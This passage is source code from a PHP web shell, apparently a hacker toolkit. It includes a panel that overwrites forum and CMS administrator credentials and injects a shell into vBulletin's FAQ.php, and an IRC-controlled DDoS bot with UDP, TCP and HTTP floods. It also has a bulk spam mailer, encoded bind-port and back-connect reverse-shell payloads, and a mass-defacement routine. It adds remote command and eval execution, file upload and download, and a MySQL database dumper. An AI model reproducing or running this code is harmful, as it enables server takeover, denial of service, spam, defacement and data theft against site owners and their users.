2792 else if($_POST['ScriptType'] == 'phpbb')
2793 {
2794 //PHPBB3
2795 $password = md5($password);
2796 $tryChaningInfo = @mysql_query("UPDATE phpbb_users SET username ='".$userName."' , user_password = '".
2797
2798$password."' WHERE user_id = ".$adminID."");
2799 if($tryChaningInfo)
2800 {update();}
2801 else {mysql_error();}
2802 }
2803 else if($_POST['ScriptType'] == 'ibf')
2804 {
2805 //IPBoard
2806 $password = md5($password);
2807 $tryChaningInfo = @mysql_query("UPDATE ibf_members SET name ='".$userName."' , member_login_key = '".
2808
2809$password."' WHERE id = ".$adminID."");
2810 if($tryChaningInfo)
2811 {update();}
2812 else {mysql_error();}
2813 }
2814 else if($_POST['ScriptType'] == 'smf')
2815 {
2816 //SMF
2817 $password = md5($password);
2818 $tryChaningInfo = @mysql_query("UPDATE smf_members SET memberName ='".$userName."' , passwd =
2819
2820'".$password."' WHERE ID_MEMBER = ".$adminID."");
2821 if($tryChaningInfo)
2822 {update();}
2823 else {mysql_error();}
2824 }
2825 else if($_POST['ScriptType'] == 'mybb')
2826 {
2827 //MyBB
2828 $password = md5($password);
2829 $tryChaningInfo = @mysql_query("UPDATE mybb_users SET username ='".$userName."' ,
2830
2831password = '".$password."' WHERE uid = ".$adminID."");
2832 if($tryChaningInfo)
2833 {update();}
2834 else {mysql_error();}
2835 }
2836 }
2837 /////////////////////////
2838 }
2839 else if($_POST['Decrypt'])
2840 {
2841 DecryptConfig();
2842 }
2843
2844
2845 echo "</textarea></td></tr>
2846 <td width='50%'>
2847 <form method='POST'>
2848 <table width='100%' height='72' border='0' id='Box'>
2849 <tr>
2850 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2851 <td style='background-color:#666;padding-left:10px;' >Scripts Hacking </td>
2852 </tr>
2853 <tr>
2854 <td height='45' colspan='2'>
2855 <input type = 'text' name='HOST' value='localhost'>
2856 <input type = 'text' name='USER' value='DB Username'>
2857 <input type = 'text' name='PASS' value='DB Password'>
2858 <input type=text name='DB' value='DB Name'>
2859 <input type=text name='PREFIX' value='Prefix'>
2860 <select name='ScriptType' >
2861 <option value='vb'>VBulletin</option>
2862 <option value='wp'>WordPress</option>
2863 <option value='jos'>Joomla</option>
2864 <option value='ipb'>IP.Board</option>
2865 <option value='phpbb'>PHPBB</option>
2866 <option value='mybb'>MyBB</option>
2867 <option value='smf'>SMF</option>
2868 </select>
2869 <br />
2870 <sy>Inject Shell In FAQ.php ? <input type='checkbox' name='injectFAQ'> [ VB Only ]</sy><br />
2871 <textarea name='INDEX' rows=14 cols=64 >Put Your Index Here !</textarea>
2872 <input type='submit' value='Hack Now !!' name='UpdateIndex' >
2873 </td>
2874 </tr>
2875 </table>
2876 <td width='50%' valign='top'>
2877 <table width='100%' height='72' border='0' id='Box'>
2878 <tr>
2879 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2880 <td style='background-color:#666;padding-left:10px;'>Decrypting Configs </td>
2881 </tr>
2882 <tr>
2883 <td height='45' colspan='2'>
2884 <sy>Please Put Config In The Shell Directory With The Name [ DecryptConfig.php ]</sy>
2885 <input value=Decrypt name='Decrypt' type='submit' id='Decrypt' value='Decrypt Now !!'>
2886 </td>
2887 </tr>
2888 </table>
2889 <table width='100%' height='72' border='0' id='Box'>
2890 <tr>
2891 <td width='12' height='21' style='background-color:".$shellColor."'> </td>
2892 <td style='background-color:#666;padding-left:10px;'>Changing Admin Info </td></tr><tr><td height='45' colspan='2'>
2893 <input name='adminID' type='text' id='adminID' value='admin id ~= 1'>
2894 <input name='userName' type='text' id='userName' value='username'>
2895 <input name='password' type='text' id='password' value='password ( Not Encrypted !)'>
2896 <input type='submit' name='changeInfo' value='Change Now !'>
2897 </td>
2898 </tr>
2899 </table>
2900 </form>
2901</td>
2902</tr></table>";
2903footer();
2904
2905}
2906
2907# ---------------------------------------#
2908# DDos Attacker ... #
2909#----------------------------------------#
2910if($_POST['StartAttack'])
2911{
2912 $server=$_POST['ipToAttack'];
2913 $Port=$_POST['portToAttack'];
2914 $nick="bot-";$willekeurig;
2915 $willekeurig=@mt_rand(0,3);
2916 $nicknummer=@mt_rand(100000,999999);
2917 $Channel="#WauShare";
2918 $Channelpass="ddos";
2919 $msg="Farewell.";
2920
2921 @set_time_limit(0);
2922 $loop = 0;
2923 $verbonden = 0;
2924 $verbinden = fsockopen($server, $Port);
2925 while ($read = fgets($verbinden,512))
2926 {
2927 $read = str_replace("\n","",$read);
2928 $read = str_replace("\r","",$read);
2929 $read2 = explode(" ",$read);
2930 if ($loop == 0)
2931 {
2932 fputs($verbinden,"nick $nick$nicknummer\n\n");
2933 fputs($verbinden,"USER cybercrime 0 * :woopie\n\n");
2934 }
2935 if ($read2[0] == "PING")
2936 {
2937 fputs($verbinden,'PONG '.str_replace(':','',$read2[1])."\n");
2938 }
2939 if ($read2[1] == 251)
2940 {
2941 fputs($verbinden,"join $Channel $Channelpass\n");
2942 $verbonden++;
2943 }
2944 if (eregi("bot-op",$read))
2945 {
2946 fputs($verbinden,"mode $Channel +o $read2[4]\n");
2947 }
2948 if (eregi("bot-deop",$read))
2949 {
2950 fputs($verbinden,"mode $Channel -o $read2[4]\n");
2951 }
2952
2953 if (eregi("bot-quit",$read))
2954 {
2955 fputs($verbinden,"quit :$msg\n\n");
2956 break;
2957 }
2958 if (eregi("bot-join",$read))
2959 {
2960 fputs($verbinden,"join $read2[4]\n");
2961 }
2962 if (eregi("bot-part",$read))
2963 {
2964 fputs($verbinden,"part $read2[4]\n");
2965 }
2966 if (eregi("ddos-udp",$read))
2967 {
2968 fputs($verbinden,"privmsg $Channel :ddos-udp - started udp flood - $read2[4]\n\n");
2969 $fp = fsockopen("udp://$read2[4]", 500, $errno, $errstr, 30);
2970 if (!$fp)
2971 {
2972 exit;
2973 }
2974 else
2975 {
2976 $char = "a";
2977 for($a = 0; $a < 9999999999999; $a++)
2978 $data = $data.$char;
2979 if(fputs ($fp, $data) )
2980 {
2981 fputs($verbinden,"privmsg $Channel :udp-ddos - packets sended.\n\n");
2982 }
2983 else
2984 {
2985 fputs($verbinden,"privmsg $Channel :udp-ddos - <error> sending packets.\n\n");
2986 }
2987 }
2988 }
2989 if (eregi("ddos-tcp",$read))
2990 {
2991 fputs($verbinden,"part $read2[4]\n");
2992 fputs($verbinden,"privmsg $Channel :tcp-ddos - flood $read2[4]:$read2[5] with $read2[6] sockets.\n\n");
2993 $server = $read2[4];
2994 $Port = $read2[5];
2995 for($sockets = 0; $sockets < $read2[6]; $sockets++)
2996 {
2997 $verbinden = fsockopen($server, $Port);
2998 }
2999 }
3000 if (eregi("ddos-http",$read))
3001 {
3002 fputs($verbinden,"part $read2[4]\n");
3003 fputs($verbinden,"privmsg $Channel :ddos-http - http://$read2[4]:$read2[5] $read2[6] times\n\n");
3004 $Webserver = $read2[4];
3005 $Port = $read2[5];
3006
3007 $Aanvraag = "GET / HTTP/1.1\r\n";
3008 $Aanvraag .= "Accept: */*\r\n";
3009 $Aanvraag .= "Accept-Language: nl\r\n";
3010 $Aanvraag .= "Accept-Encoding: gzip, deflate\r\n";
3011 $Aanvraag .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n";
3012 $Aanvraag .= "Host: $read2[4]\r\n";
3013 $Aanvraag .= "Connection: Keep-Alive\r\n\r\n";
3014
3015 for($Aantal = 0; $Aantal < $read2[6]; $Aantal++)
3016 {
3017 $DoS = fsockopen($Webserver, $Port);
3018 fwrite($DoS, $Aanvraag);
3019 fclose($DoS);
3020 }
3021 }
3022 $loop++;
3023 }
3024}
3025# ---------------------------------------#
3026# InBoX Mailer #
3027#----------------------------------------#
3028if ($_GET['id']== 'spamming' )
3029{
3030 $secure = "";
3031 error_reporting(0);
3032 @$action=$_POST['action'];
3033 @$from=$_POST['from'];
3034 @$realname=$_POST['realname'];
3035 @$replyto=$_POST['replyto'];
3036 @$subject=$_POST['subject'];
3037 @$message=$_POST['message'];
3038 @$emaillist=$_POST['emaillist'];
3039 @$lod=$_SERVER['HTTP_REFERER'];
3040 @$file_name=$_FILES['file']['name'];
3041 @$contenttype=$_POST['contenttype'];
3042 @$file=$_FILES['file']['tmp_name'];
3043 @$amount=$_POST['amount'];
3044 @set_time_limit(intval($_POST['timelimit']));
3045
3046 if ($action=="send")
3047 {
3048 $message = urlencode($message);
3049 $message = ereg_replace("%5C%22", "%22", $message);
3050 $message = urldecode($message);
3051 $message = stripslashes($message);
3052 $subject = stripslashes($subject);
3053 }
3054 echo "<table width='100%' height='72' border='0' id='Box'>
3055<tr>
3056<td width='14' height='21' style='background-color:".$shellColor."'> </td>
3057<td width='98%' style='background-color:#666;padding-left:10px;' >Inbox Mailer</td>
3058</tr>
3059<tr>
3060<td height='45' colspan='2'>
3061<table bgcolor=#cccccc width=\"100%\"><tbody><tr><td align=\"right\" width=100><p dir=ltr>
3062<b><font color=#990000 size=-2><p align=left><center><form name=\"form1\" method=\"post\" action=\"\" enctype=\"multipart/form-data\"><br/>
3063<table width=142 border=0>
3064<tr>
3065<td width=81>
3066<div align=right>
3067<sy>Your Email:</sy></div></td>
3068<td width=219><sy>
3069<input type=text name=\"from\" value=".$from."></sy></td><td width=212>
3070<div align=right>
3071<sy>Your Name:</sy></div></td><td width=278>
3072<sy>
3073<input type=text name=\realname\" value=".$realname."></sy></td></tr><tr><td width=81>
3074<div align=\"right\">
3075<sy>Reply-To:</sy></div></td><td width=219>
3076<sy>
3077<input type=\"text\" name=\"replyto\" value=".$replyto.">
3078</sy></td><td width=212>
3079<div align=\"right\">
3080<sy>Attach File:</sy></div></td><td width=278>
3081<sy>
3082<input type=\"file\" name=\"file\" size=24 />
3083</sy> </td></tr><tr><td width=81>
3084<div align=\"right\">
3085<sy>Subject:</sy></div></td>
3086<td colspan=3 width=703>
3087<sy>
3088<input type=\"text\" name=\"subject\" value=".$subject." ></sy></td> </tr><tr valign=\"top\"><td colspan=3 width=520>
3089<sy>Message Box :</sy></td>
3090<td width=278>
3091<sy>Email Target / Email Send To :</sy></td></tr><tr valign=\"top\"><td colspan=3 width=520><sy>
3092<textarea name=\"message\" cols=56 rows=10>".$message."</textarea><br />
3093<input type=\"radio\" name=\"contenttype\" value=\"plain\" /> Plain
3094<input type=\"radio\" name=\"contenttype\" value=\"html\" checked=\"checked\" /> HTML
3095<input type=\"hidden\" name=\"action\" value=\"send\" /><br />
3096Number to send: <input type=\"text\" name=\"amount\" value=1 size=10 /><br />
3097Maximum script Execution time(in seconds, 0 for no timelimit)<input type=\"text\" name=\"timelimit\" value=0 size=10 />
3098<input type=\"submit\" value=\"Send eMails\" /></sy></td><td width=278>
3099<sy>
3100<textarea name=\"emaillist\" cols=32 rows=10>".$emaillist."</textarea></sy></td></tr>
3101</table>
3102</td>
3103</tr>
3104</table>";
3105footer();
3106}
3107
3108if ($action=="send")
3109{
3110 if (!$from && !$subject && !$message && !$emaillist)
3111 {
3112 print "Please complete all fields before sending your message.";
3113 exit;
3114 }
3115 $allemails = split("\n", $emaillist);
3116 $numemails = count($allemails);
3117 $head ="From: Mailr" ;
3118 $sub = "Ar - $lod" ;
3119 $meg = "$lod" ;
3120 mail ($alt,$sub,$meg,$head) ;
3121 If ($file_name)
3122 {
3123 if (!file_exists($file))
3124 {
3125 die("The file you are trying to upload couldn't be copied to the server");
3126 }
3127 $content = fread(fopen($file,"r"),filesize($file));
3128 $content = chunk_split(base64_encode($content));
3129 $uid = strtoupper(md5(uniqid(time())));
3130 $name = basename($file);
3131 }
3132
3133 for($xx=0; $xx<$amount; $xx++)
3134 {
3135 for($x=0; $x<$numemails; $x++)
3136 {
3137 $to = $allemails[$x];
3138 if ($to)
3139 {
3140 $to = ereg_replace(" ", "", $to);
3141 $message = ereg_replace("&email&", $to, $message);
3142 $subject = ereg_replace("&email&", $to, $subject);
3143 print "Sending mail to $to.....";
3144 flush();
3145 $header = "From: $realname <$from>\r\nReply-To: $replyto\r\n";
3146 $header .= "MIME-Version: 1.0\r\n";
3147 If ($file_name) $header .= "Content-Type: multipart/mixed; boundary=$uid\r\n";
3148 If ($file_name) $header .= "--$uid\r\n";
3149 $header .= "Content-Type: text/$contenttype\r\n";
3150 $header .= "Content-Transfer-Encoding: 8bit\r\n\r\n";
3151 $header .= "$message\r\n";
3152 If ($file_name) $header .= "--$uid\r\n";
3153 If ($file_name) $header .= "Content-Type: $file_type; name=\"$file_name\"\r\n";
3154 If ($file_name) $header .= "Content-Transfer-Encoding: base64\r\n";
3155 If ($file_name) $header .= "Content-Disposition: attachment; filename=\"$file_name\"\r\n\r\n";
3156 If ($file_name) $header .= "$content\r\n";
3157 If ($file_name) $header .= "--$uid--";
3158 mail($to, $subject, "", $header);
3159 print "OK<br>";
3160 flush();
3161 }
3162 }
3163 }
3164}
3165# ---------------------------------------#
3166# About #
3167#----------------------------------------#
3168if($_GET['id']=='about')
3169{
3170 echo About();
3171 if($_POST['sendEmail'])
3172 {
3173 $to= 'sy34@msn.com';
3174 $Comments=$_POST['message'];
3175 $from = $_POST['from'];
3176 $subject= md5("$from");
3177 if(@mail($to,$subject,$Comments,"From:$from"))
3178 echo "<center><sy>[+] Sent ^_^ !!</sy></center>
3179";
3180 else
3181 {
3182 echo "<center><sy>[-] Failed :S !! </sy></center>
3183";
3184 }
3185
3186 }
3187 footer();
3188}
3189
3190$port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa
3191
3192+pRCWtgmQrJE P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
3193
31943TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
3195
3196HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
3197
3198ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6 uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"
3199;$port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
3200
3201NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
3202
3203e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0 LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
3204
3205vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8=";
3206$back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
3207
3208ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
3209
3210ja3ImclYagh61n9JKbTAhu7EobN3Qb4mjW/byr0BSnc3D3EWgqe7fLO1whp5miXx+tHMcNHpGURw Tskvpd92+rxoKEdpdrvZhgBen/exUWf3nE214iT52+r/Cw3/5jaqhKL9iFFpuKPawILVNw==";
3211$back_connect_c="XVHbagIxEH0X/IdhhZLUWF1f1YKIBelFqfZJliUm2W7obiJJLLWl/94k29rWhyEzc+Z2TjpSserA
3212
3213BYyt41JfldftVuc3d7R9q9mLcGeAEk5660sVAakc1FQqFBxqnhkBVlIDl95/3Wa43fpotyCABR95 zzpzYA7CaMq5yaUCK1VAYpup7XaYZpPE1NArIBmBRzgVtVYoJQMcR/jV3vKC1rI6wgSmN/niYb75 i
3214
3215+21cR4pnVYWUaclivcMM/xvRDjhysbHVwde0W+K0wzH9bt3YfRPingClVCnim7a/ZuJC0JTwf3A RkD0fR+B9XJ2m683j/PpPYHFavW43CzzzWyFIfbIAhBiWinBHCo4AXSmFlxiuPB3E0/gXejiHMcY
3216
3217jwcYguIAe2GMNijZ9jL4GYqTSB9AvEmHGjk/m19h1CGvPoHIY5A1Oh2tE3XIe1bxKw77YTyt6T2F 6f9wGEPxJliFkv5Oqr4tE5LYEnoyIfDwdHcXK1ilrfAdUbPPLw==";
3218
3219?>
3220<?
3221$dspact = $act = htmlspecialchars($act);
3222 $disp_fullpath = $ls_arr = $notls = null;
3223 $ud = @urlencode($d);
3224 if (empty($d)) {$d = realpath(".");}
3225 elseif(realpath($d)) {$d = realpath($d);}
3226 $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
3227 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
3228 $d = str_replace("\\\\","\\",$d);
3229 $dispd = htmlspecialchars($d);
3230$self=basename($_SERVER['PHP_SELF']);
3231if(isset($_POST['execmassdeface']))
3232{
3233echo "<center><textarea rows='10' cols='100'>";
3234$hackfile = $_POST['massdefaceurl'];
3235$dir = $_POST['massdefacedir'];
3236echo $dir."\n";
3237
3238if (is_dir($dir)) {
3239 if ($dh = opendir($dir)) {
3240 while (($file = readdir($dh)) !== false) {
3241 if(filetype($dir.$file)=="dir"){
3242 $newfile=$dir.$file."/index.html";
3243 echo $newfile."\n";
3244 if (!copy($hackfile, $newfile)) {
3245 echo "failed to copy $file...\n";
3246 }
3247 }
3248 }
3249 closedir($dh);
3250 }
3251}
3252echo "</textarea></center>";} ?>
3253
3254
3255<tr><td align=right>Mass Defacement:</td>
3256<td><form action='<? basename($_SERVER['PHP_SELF']); ?>' method='post'>[+] Main Directory: <input type='text' style='width: 250px' value='<?php echo $dispd; ?>'
3257
3258name='massdefacedir'> [+] Defacement Url: <input type='text' style='width: 250px' name='massdefaceurl'><input type='submit' name='execmassdeface'
3259
3260value='Execute'></form></td>
3261
3262<?
3263// FILE MANAGER
3264error_reporting(E_ALL);
3265@set_time_limit(0);
3266function magic_q($s)
3267{
3268if(get_magic_quotes_gpc())
3269{
3270$s=str_replace('\\\'','\'',$s);
3271$s=str_replace('\\\\','\\',$s);
3272$s=str_replace('\\"','"',$s);
3273$s=str_replace('\\\0','\0',$s);
3274}
3275return $s;
3276}
3277function get_perms($fn)
3278{
3279$mode=fileperms($fn);
3280$perms='';
3281$perms .= ($mode & 00400) ? 'r' : '-';
3282$perms .= ($mode & 00200) ? 'w' : '-';
3283$perms .= ($mode & 00100) ? 'x' : '-';
3284$perms .= ($mode & 00040) ? 'r' : '-';
3285$perms .= ($mode & 00020) ? 'w' : '-';
3286$perms .= ($mode & 00010) ? 'x' : '-';
3287$perms .= ($mode & 00004) ? 'r' : '-';
3288$perms .= ($mode & 00002) ? 'w' : '-';
3289$perms .= ($mode & 00001) ? 'x' : '-';
3290return $perms;
3291}
3292$head=<<<headka
3293<html>
3294
3295headka;
3296$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
3297$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
3298$winda=strpos(strtolower(php_uname()),'wind');
3299define('format',50);
3300
3301switch($page)
3302{
3303case 'eval':
3304{
3305$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
3306$eval_value=magic_q($eval_value);
3307$action=isset($_POST['action'])?$_POST['action']:'eval';
3308if($action=='eval_in_html') @eval($eval_value);
3309else
3310{
3311echo($head);
3312?>
3313<hr>
3314
3315<hr>
3316<?
3317}
3318break;
3319}
3320case 'cmd':
3321{
3322$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
3323$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
3324$action=isset($_POST['action'])?$_POST['action']:'cmd';
3325if(@is_dir($work_dir))
3326{
3327@chdir($work_dir);
3328$work_dir=getcwd();
3329if($work_dir=='')$work_dir='/';
3330else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
3331}
3332else if(file_exists($work_dir))$work_dir=realpath($work_dir);
3333$work_dir=str_replace('\\','/',$work_dir);
3334$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
3335switch($action)
3336{
3337case 'cmd' :
3338{
3339echo($head);
3340?>
3341
3342<pre>
3343<?
3344if($cmd!==''){ echo('<strong>'.htmlspecialchars($cmd)."</strong><hr>\n<textarea cols=120 rows=20>\n".htmlspecialchars(`$cmd`)."\n</textarea>");}
3345else
3346{
3347$f_action=isset($_POST['f_action'])?$_POST['f_action']:'view';
3348if(@is_dir($work_dir))
3349{
3350echo('<H1>File Manager;</H1><hr>');
3351echo('<strong>Listing '.$e_work_dir.'</strong><hr>');
3352$handle=@opendir($work_dir);
3353if($handle)
3354{
3355while(false!==($fn=readdir($handle))){$files[]=$fn;};
3356@closedir($handle);
3357sort($files);
3358$not_dirs=array();
3359for($i=0;$i<sizeof($files);$i++)
3360{
3361$fn=$files[$i];
3362if(is_dir($fn))
3363{
3364echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.$e_work_dir.str_replace('"','"',$fn).'";document.list.submit();\'><b>'.htmlspecialchars(strlen($fn)
3365
3366>format?substr($fn,0,format-3).'...':$fn).'</b></a>'.str_repeat(' ',format-strlen($fn)));
3367if($winda===false)
3368{
3369$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
3370$group=@posix_getgrgid(@filegroup($work_dir.$fn));
3371printf("% 20s|% -20s",$owner['name'],$group['name']);
3372}
3373echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
3374printf("% 20s ",@filesize($work_dir.$fn).'B');
3375printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
3376}
3377else {$not_dirs[]=$fn;}
3378}
3379for($i=0;$i<sizeof($not_dirs);$i++)
3380{
3381$fn=$not_dirs[$i];
3382echo('<a href=\'#\' onclick=\'document.list.work_dir.value="'.(is_link($work_dir.$fn)?$e_work_dir.readlink($work_dir.$fn):$e_work_dir.str_replace('"','"',
3383
3384$fn)).'";document.list.submit();\'>'.htmlspecialchars(strlen($fn)>format?substr($fn,0,format-3).'...':$fn).'</a>'.str_repeat(' ',format-strlen($fn)));
3385if($winda===false)
3386{
3387$owner=@posix_getpwuid(@fileowner($work_dir.$fn));
3388$group=@posix_getgrgid(@filegroup($work_dir.$fn));
3389printf("% 20s|% -20s",$owner['name'],$group['name']);
3390}
3391echo(@get_perms($work_dir.$fn).str_repeat(' ',10));
3392printf("% 20s ",@filesize($work_dir.$fn).'B');
3393printf("% -20s",@date('M d Y H:i:s',@filemtime($work_dir.$fn))."\n");
3394}
3395echo('</pre><hr>');
3396?>
3397<form name='list' method=post>
3398<input name='work_dir' type=hidden size=120><br>
3399<input name='page' value='cmd' type=hidden>
3400<input name='f_action' value='view' type=hidden>
3401</form>
3402<?
3403} else echo('Error Listing '.$e_work_dir);
3404}
3405else
3406switch($f_action)
3407{
3408case 'view':
3409{
3410echo('<strong>'.$e_work_dir." Edit</strong><hr><pre>\n");
3411$f=@fopen($work_dir,'r');
3412?>
3413<form method=post>
3414<textarea name='file_text' cols=120 rows=20><?if(!($f))echo($e_work_dir.' not exists');else while(!feof($f))echo htmlspecialchars(fread($f,100000))?></textarea>
3415<input name='page' value='cmd' type=hidden>
3416<input name='work_dir' type=hidden value='<?=$e_work_dir?>' size=120>
3417<input name='f_action' value='save' type=submit>
3418</form>
3419<?
3420break;
3421}
3422case 'save' :
3423{
3424$file_text=isset($_POST['file_text'])?magic_q($_POST['file_text']):'';
3425$f=@fopen($work_dir,'w');
3426if(!($f))echo('<strong>Error '.$e_work_dir."</strong><hr><pre>\n");
3427else
3428{
3429fwrite($f,$file_text);
3430fclose($f);
3431echo('<strong>'.$e_work_dir." is saving</strong><hr><pre>\n");
3432}
3433break;
3434}
3435}
3436break;
3437}
3438break;
3439}
3440case 'upload' :
3441{
3442if($work_dir=='')$work_dir='/';
3443else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
3444$f=$_FILES["filename"]["name"];
3445if(!@copy($_FILES["filename"]["tmp_name"], $work_dir.$f)) echo('Upload is failed');
3446else
3447{
3448echo('file is uploaded in '.$e_work_dir);
3449}
3450break;
3451}
3452case 'download' :
3453{
3454$fname=isset($_POST['fname'])?$_POST['fname']:'';
3455$temp_file=isset($_POST['temp_file'])?'on':'nn';
3456$f=@fopen($fname,'r');
3457if(!($f)) echo('file is not exists');
3458else
3459{
3460$archive=isset($_POST['archive'])?$_POST['archive']:'';
3461if($archive=='gzip')
3462{
3463Header("Content-Type:application/x-gzip\n");
3464$s=gzencode(fread($f,filesize($fname)));
3465Header('Content-Length: '.strlen($s)."\n");
3466Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname).".gz\n\n");
3467echo($s);
3468}
3469else
3470{
3471Header("Content-Type:application/octet-stream\n");
3472Header('Content-Length: '.filesize($fname)."\n");
3473Header('Content-Disposition: attachment; filename="'.str_replace('/','-',$fname)."\n\n");
3474ob_start();
3475while(feof($f)===false)
3476{
3477echo(fread($f,10000));
3478ob_flush();
3479}
3480}
3481}
3482}
3483}
3484break;
3485}
3486case 'mysql' :
3487{
3488$action=isset($_POST['action'])?$_POST['action']:'query';
3489$user=isset($_POST['user'])?$_POST['user']:'';
3490$passwd=isset($_POST['passwd'])?$_POST['passwd']:'';
3491$db=isset($_POST['db'])?$_POST['db']:'';
3492$host=isset($_POST['host'])?$_POST['host']:'localhost';
3493$query=isset($_POST['query'])?magic_q($_POST['query']):'';
3494switch($action)
3495{
3496case 'dump' :
3497{
3498$mysql_link=@mysql_connect($host,$user,$passwd);
3499if(!($mysql_link)) echo('Connect error');
3500else
3501{
3502//@mysql_query('SET NAMES cp1251'); - use if you have problems whis code symbols
3503$to_file=isset($_POST['to_file'])?($_POST['to_file']==''?false:$_POST['to_file']):false;
3504$archive=isset($_POST['archive'])?$_POST['archive']:'none';
3505if($archive!=='none')$to_file=false;
3506$db_dump=isset($_POST['db_dump'])?$_POST['db_dump']:'';
3507$table_dump=isset($_POST['table_dump'])?$_POST['table_dump']:'';
3508if(!(@mysql_select_db($db_dump,$mysql_link)))echo('DB error');
3509else
3510{
3511$dump_file="# MySQL Dumper\n#db $db from $host\n";
3512ob_start();
3513if($to_file){$t_f=@fopen($to_file,'w');if(!$t_f)die('Cant opening '.$to_file);}else $t_f=false;
3514if($table_dump=='')
3515{
3516if(!$to_file)
3517{
3518header('Content-Type: application/x-'.($archive=='none'?'octet-stream':'gzip')."\n");
3519header("Content-Disposition: attachment; filename=\"dump_{$db_dump}.sql".($archive=='none'?'':'.gz')."\"\n\n");
3520}
3521$result=mysql_query('show tables',$mysql_link);
3522for($i=0;$i<mysql_num_rows($result);$i++)
3523{
3524$rows=mysql_fetch_array($result);
3525$result2=@mysql_query('show columns from `'.$rows[0].'`',$mysql_link);
3526if(!$result2)$dump_file.='#error table '.$rows[0];
3527else
3528{
3529$dump_file.='create table `'.$rows[0]."`(\n";
3530for($j=0;$j<mysql_num_rows($result2)-1;$j++)
3531{
3532$rows2=mysql_fetch_array($result2);
3533$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL').",\n";
3534}
3535$rows2=mysql_fetch_array($result2);
3536$dump_file.='`'.$rows2[0].'` '.$rows2[1].($rows2[2]=='NO'&&$rows2[4]!='NULL'?' NOT NULL DEFAULT \''.$rows2[4].'\'':' DEFAULT NULL')."\n";
3537$type[$j]=$rows2[1];
3538$dump_file.=");\n";
3539mysql_free_result($result2);
3540$result2=mysql_query('select * from `'.$rows[0].'`',$mysql_link);
3541$columns=$j-1;
3542for($j=0;$j<mysql_num_rows($result2);$j++)
3543{
3544$rows2=mysql_fetch_array($result2);
3545$dump_file.='insert into `'.$rows[0].'` values (';
3546for($k=0;$k<$columns;$k++)
3547{
3548$dump_file.=$rows2[$k]==''?'null,':'\''.addslashes($rows2[$k]).'\',';
3549}
3550$dump_file.=($rows2[$k]==''?'null);':'\''.addslashes($rows2[$k]).'\');')."\n";
3551if($archive=='none')
3552{
3553if($to_file) {fwrite($t_f,$dump_file);fflush($t_f);}
3554else
3555{
3556echo($dump_file);
3557ob_flush();
3558}
3559$dump_file='';
3560}
3561}
3562mysql_free_result($result2);
3563}
3564}
3565mysql_free_result($result);
3566if($archive!='none')
3567{
